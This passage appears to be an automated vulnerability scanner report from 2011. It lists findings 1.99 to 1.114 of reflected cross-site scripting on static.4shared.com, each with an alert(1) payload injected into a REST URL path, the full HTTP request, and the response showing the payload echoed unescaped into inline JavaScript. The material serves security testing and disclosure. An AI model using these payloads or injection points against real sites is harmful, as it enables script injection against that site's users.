Content-Length: 36245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/pageDownload1/download.css96d76'-alert(1)-'49d42fb02e7',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.99. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5cd"-alert(1)-"8d2149dd564 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F366F4B86F7A2AFCA5A418971330D4EE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:24 GMT
Content-Length: 36245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.100. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0abd'-alert(1)-'d6c09a47272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssf0abd'-alert(1)-'d6c09a47272/pageDownload1/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssf0abd'-alert(1)-'d6c09a47272/pageDownload1/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B99C6874A3278E715EF40A91E49E440B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:19 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/cssf0abd'-alert(1)-'d6c09a47272/pageDownload1/downloadWithoutCommon.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
s
...[SNIP]...

1.101. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c69"-alert(1)-"2cf4627ec1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEFF1912BC6968ADA5A19D19FCFCF489.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:18 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.102. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc6d6'-alert(1)-'433f0c3aa2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1dc6d6'-alert(1)-'433f0c3aa2b/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1dc6d6'-alert(1)-'433f0c3aa2b/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E98C0E04452CFCF8F2DA68474C38AAE4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:26 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/pageDownload1dc6d6'-alert(1)-'433f0c3aa2b/downloadWithoutCommon.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
...[SNIP]...

1.103. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec9c"-alert(1)-"5240765fe67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F9F95CE1BFBC4C7B9EC88DA773F9FA0B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

1.104. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47081"-alert(1)-"19897fe20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3449E686BCEAB24A694106C9996937F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:31 GMT
Content-Length: 36299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.105. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39006'-alert(1)-'5a2d804c150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1/downloadWithoutCommon.css39006'-alert(1)-'5a2d804c150 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/downloadWithoutCommon.css39006'-alert(1)-'5a2d804c150
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B82A89CA6F14D991AAED5DDE811A2F74.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:32 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css39006'-alert(1)-'5a2d804c150',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.106. http://static.4shared.com/css/tutorial.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/tutorial.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64356'-alert(1)-'e90da26cc12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css64356'-alert(1)-'e90da26cc12/tutorial.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css64356'-alert(1)-'e90da26cc12/tutorial.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=044262E3749BD221F83F81511743DFAE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:07 GMT
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css64356'-alert(1)-'e90da26cc12/tutorial.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.107. http://static.4shared.com/css/tutorial.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/tutorial.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa773"-alert(1)-"b1f17542dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssaa773"-alert(1)-"b1f17542dec/tutorial.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssaa773"-alert(1)-"b1f17542dec/tutorial.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=72479505BB09D25E8361A917AB871891.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:05 GMT
Content-Length: 36164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssaa773"-alert(1)-"b1f17542dec/tutorial.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.108. http://static.4shared.com/css/tutorial.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/tutorial.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd74e"-alert(1)-"6dad30ac8f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93B8E7619EDD47EBB4FBE25560CB6C1A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:09 GMT
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.109. http://static.4shared.com/css/tutorial.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/tutorial.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18229'-alert(1)-'e8d5248cdfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/tutorial.css18229'-alert(1)-'e8d5248cdfc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/tutorial.css18229'-alert(1)-'e8d5248cdfc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7BAAE21CB575676FBDFA13AE2F3C6D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:10 GMT
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/tutorial.css18229'-alert(1)-'e8d5248cdfc',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.110. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/desktop/desktop.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f396c"-alert(1)-"7819c5badf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /desktopf396c"-alert(1)-"7819c5badf/desktop.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktopf396c"-alert(1)-"7819c5badf/desktop.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C1A7BD0B0E6AF8E747AC2544F9A16C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:40 GMT
Content-Length: 36174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktopf396c"-alert(1)-"7819c5badf/desktop.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.111. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/desktop/desktop.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e5e4'-alert(1)-'fae2f284b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /desktop5e5e4'-alert(1)-'fae2f284b6c/desktop.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop5e5e4'-alert(1)-'fae2f284b6c/desktop.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7FCFAEECFEE9EA07899D0A2BAF80767F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:41 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/desktop5e5e4'-alert(1)-'fae2f284b6c/desktop.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.112. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/desktop/desktop.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4e0'-alert(1)-'0596a4a67da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /desktop/desktop.css6e4e0'-alert(1)-'0596a4a67da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop/desktop.css6e4e0'-alert(1)-'0596a4a67da
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5C0636EFCE99BFE9FDDE3F97D75DE7AE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:46 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/desktop/desktop.css6e4e0'-alert(1)-'0596a4a67da',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.113. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/desktop/desktop.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 630cd"-alert(1)-"d08d1566e98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /desktop/desktop.css630cd"-alert(1)-"d08d1566e98 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop/desktop.css630cd"-alert(1)-"d08d1566e98
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA5872801E98E173BB61348634CE6CF6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:45 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktop/desktop.css630cd"-alert(1)-"d08d1566e98";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.114. http://static.4shared.com/dwr/engine.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/engine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7289a"-alert(1)-"da5431a7505 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr7289a"-alert(1)-"da5431a7505/engine.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwr7289a"-alert(1)-"da5431a7505/engine.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00B3741014BF2AD0E8FF51C5BA549003.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:45 GMT
Content-Length: 36160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
